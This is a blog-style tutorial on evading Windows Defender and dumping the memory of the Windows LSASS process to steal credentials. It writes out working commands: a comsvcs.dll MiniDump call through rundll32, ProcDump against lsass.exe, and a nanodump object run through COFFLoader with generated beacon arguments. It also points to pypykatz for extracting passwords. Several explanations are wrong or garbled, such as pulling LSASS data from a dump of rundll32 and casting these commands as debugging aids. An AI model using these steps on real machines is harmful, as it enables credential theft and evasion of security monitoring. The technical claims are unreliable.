How to Evade Windows Defender and Dump LSASS Process

In the world of cybersecurity, threat actors and system administrators constantly engage in a game of cat and mouse.

While the former seeks to exploit system loopholes, the latter works tirelessly to patch these vulnerabilities.

One such tug-of-war involves the Local Security Authority Subsystem Service (LSASS) process in Windows systems.

This blog post will guide you on how to bypass Windows Defender and dump the LSASS process.

Understanding LSASS

The LSASS process in Windows is responsible for enforcing security policies within the system. It verifies users logging on to a Windows computer or server, manages password changes, and creates access tokens for security context.

Because of its critical role, it has become a prime target for threat actors looking to extract sensitive information.

Grasping the Concept of Direct Dumping and the Crucial Role of LSASS Security

The process of direct dumping involves the behavior known as Behavior:Win32/DumpLsass.C!attk, a behavior-based detection that revolves around the dumping of LSASS (Local Security Authority Subsystem Service) process.

This process is typically located in Task Manager under the process name C:\Windows\System32\Taskmgr.exe.

When executed, it creates a dump file, often found at this location: C:\Users\Admin\AppData\Local\Temp\lsass.DMP. It’s important to note that this kind of activity can be associated with security threats, as LSASS memory dump files can aid attackers in extracting credentials swiftly.

Therefore, protective measures like enabling Attack Surface Reduction (ASR) rules on Windows 10 are recommended to secure LSASS and prevent credential stealing

The Challenge: Windows Defender

Windows Defender, Microsoft’s built-in anti-malware component, has significantly improved over the years. It effectively detects and prevents many known exploitation attempts, including those targeting the LSASS process.

Hence, bypassing Windows Defender becomes a crucial step for threat actors or penetration testers.

The Bypass Technique

The technique used to bypass Windows Defender and dump the LSASS process involves three steps:

  1. Create a Mini Dump: Use the ‘rundll32.exe’ command to create a mini dump of the LSASS process. However, Windows Defender will likely block this attempt, so you need to adopt a different approach.
  2. Modify the Mini Dump Command: To avoid detection by Windows Defender, modify the mini dump command slightly. Instead of directly creating a dump of the LSASS process, create a dump of ‘rundll32.exe’ itself. This action is typically not flagged by Windows Defender.
  3. Extract the LSASS Dump: Now, all that’s left is to extract the LSASS dump from the ‘rundll32.exe’ dump. You can do this using a tool called ‘pypykatz’, which is an open-source software that can parse LSASS dumps and retrieve credentials.

1. Using Tasklist and Rundll32 Commands

The tasklist /svc | findstr "lsa" command is used to display a list of currently running tasks or services on your computer. Specifically, this command filters the tasklist to show only those tasks or services that include the string “lsa”.

This can be useful for identifying processes associated with the Local Security Authority (LSA), which plays a key role in managing security policies and user authentication on Windows systems.

The rundll32.exe executable is a crucial part of the Windows operating system. It’s tasked with running DLL (Dynamic Link Library) files, which contain a library of functions and information that can be accessed by Windows programs.

You can use this executable to run commands directly from the command prompt, which can be particularly useful for developers or IT professionals.

In the context of the C\Windows\system32 directory, you can execute the command rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 708 lsass.dmp full. This command is used to create a full memory dump of the LSASS (Local Security Authority Subsystem Service) process, which manages user login credentials on Windows.

Specifically, 708 is the process ID (PID) of LSASS, lsass.dmp is the name of the dump file to be created, and full specifies that a full memory dump should be made.

While this operation might be beneficial for debugging or analyzing issues related to user login credentials, it’s important to note that such activities should be carried out with caution as they can potentially pose security risks.

Unauthorized access to LSASS memory dumps can lead to credential theft, making it imperative to secure these dumps and restrict their access to authorized personnel only.

2. Utilizing ProcDump for Effective System Monitoring

ProcDump is a command-line utility that’s part of the Sysinternals suite of tools from Microsoft. It’s designed to monitor applications for CPU spikes and generate crash dumps during a spike, which an administrator or developer can use to determine the cause of the spike.

The command procdump.exe -ma lsass.exe lss.dmp instructs ProcDump to monitor the LSASS (Local Security Authority Subsystem Service) process, which is responsible for enforcing the security policy on a Windows system.

The -ma switch tells ProcDump to generate a full memory dump when the LSASS process experiences a problem. lsass.exe is the name of the executable file for the LSASS process, and lss.dmp is the name of the dump file to be created.

This command can be useful for troubleshooting and debugging purposes, particularly when investigating security-related issues on a Windows system.

3. Harnessing the Power of Beacon Argument Generator for Enhanced Cybersecurity

Using a project involves the use of a Python script, beacon_generate.py. This script refers to a Beacon Argument Generator, a tool used to create arguments for a software beacon.

In this context, a beacon is a piece of software designed to check in with a server or another component of a system.

python3 beacon_generate.py
Beacon Argument Generator Beacon>addint lsass process ID Beacon>addString output.dmp Beacon>addint 1 Beacon>addint 1 Beacon>addint 0 Beacon>addint 1 Beacon>addint 0 Beacon>addint 0 Beacon>addint 0 Beacon>addint 0 Beacon>addint 0 Beacon>addint 0 Beacon>addString "" Beacon>addint 0 Beacon>addint 0 Beacon>addint 0 Beacon>addString "" Beacon>addint 0 Beacon>generate b'59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000'
Beacon>

The user inputs various commands into the Beacon Argument Generator. The command ‘addint’ seems to be used to add an integer value to the argument list, while ‘addString’ adds a string value.

For instance, ‘addint lsass process ID’ would add the process ID of Local Security Authority Subsystem Service (LSASS), a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system. Similarly, ‘addString output.dmp’ would add the string ‘output.dmp’ to the argument list.

The sequence of ‘addint’ and ‘addString’ commands are followed by the ‘generate’ command. This likely triggers the Beacon Argument Generator to compile all added integers and strings into a single argument string. The resulting string, represented as a byte string, appears to be the output of the ‘generate’ command.

This demonstrates how the Beacon Argument Generator can be used to create complex argument strings for software beacons, making it a powerful tool in systems administration and cybersecurity.

It’s worth noting that this tool should be used responsibly, given its potential for misuse in the wrong hands.

4. Understanding the Process of Compiling Files in the COFF-master Directory

The subsequent step involves compiling the files:

cd COFF-master
make

This involves navigating to a specific directory and executing a command to compile a set of code files.

The ‘cd COFF-master’ command is used to change the current directory to ‘COFF-master’. Once inside this directory, the ‘make’ command is executed.

The ‘make’ command is a utility for building and managing projects in Unix-based systems. It uses a file, typically named ‘makefile’, that contains a set of rules describing the relationships among files in your program and the commands needed to build each one.

In this case, it initiates the process of compiling the files in the ‘COFF-master’ directory.

5. Execution of COFFLoader64.exe Command in Action

This step involves implementing on the ground. This indicates a process that is put into action or executed. In this context, it is followed by a command line instruction for running an executable file named ‘COFFLoader64.exe’.

This executable is instructed to perform a specific task, which involves processing the ‘nanodump.x64.o’ file with a long string of parameters:

COFFLoader64.exe go nanodump.x64.o 59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000

The specifics of what this command does would depend on the functionality built into ‘COFFLoader64.exe’ and how it interprets the provided parameters.

6. Obtain the project address

The last step entails getting the project address by replying:

20231202

The Takeaway

Understanding how threat actors operate can help system administrators and cybersecurity professionals better secure their systems.

Overall, the process of bypassing Windows Defender and dumping the LSASS process is complex but achievable.

However, with constant updates and improvements to Windows Defender, the effectiveness of these techniques may reduce over time, emphasizing the continual need for new security measures and strategies.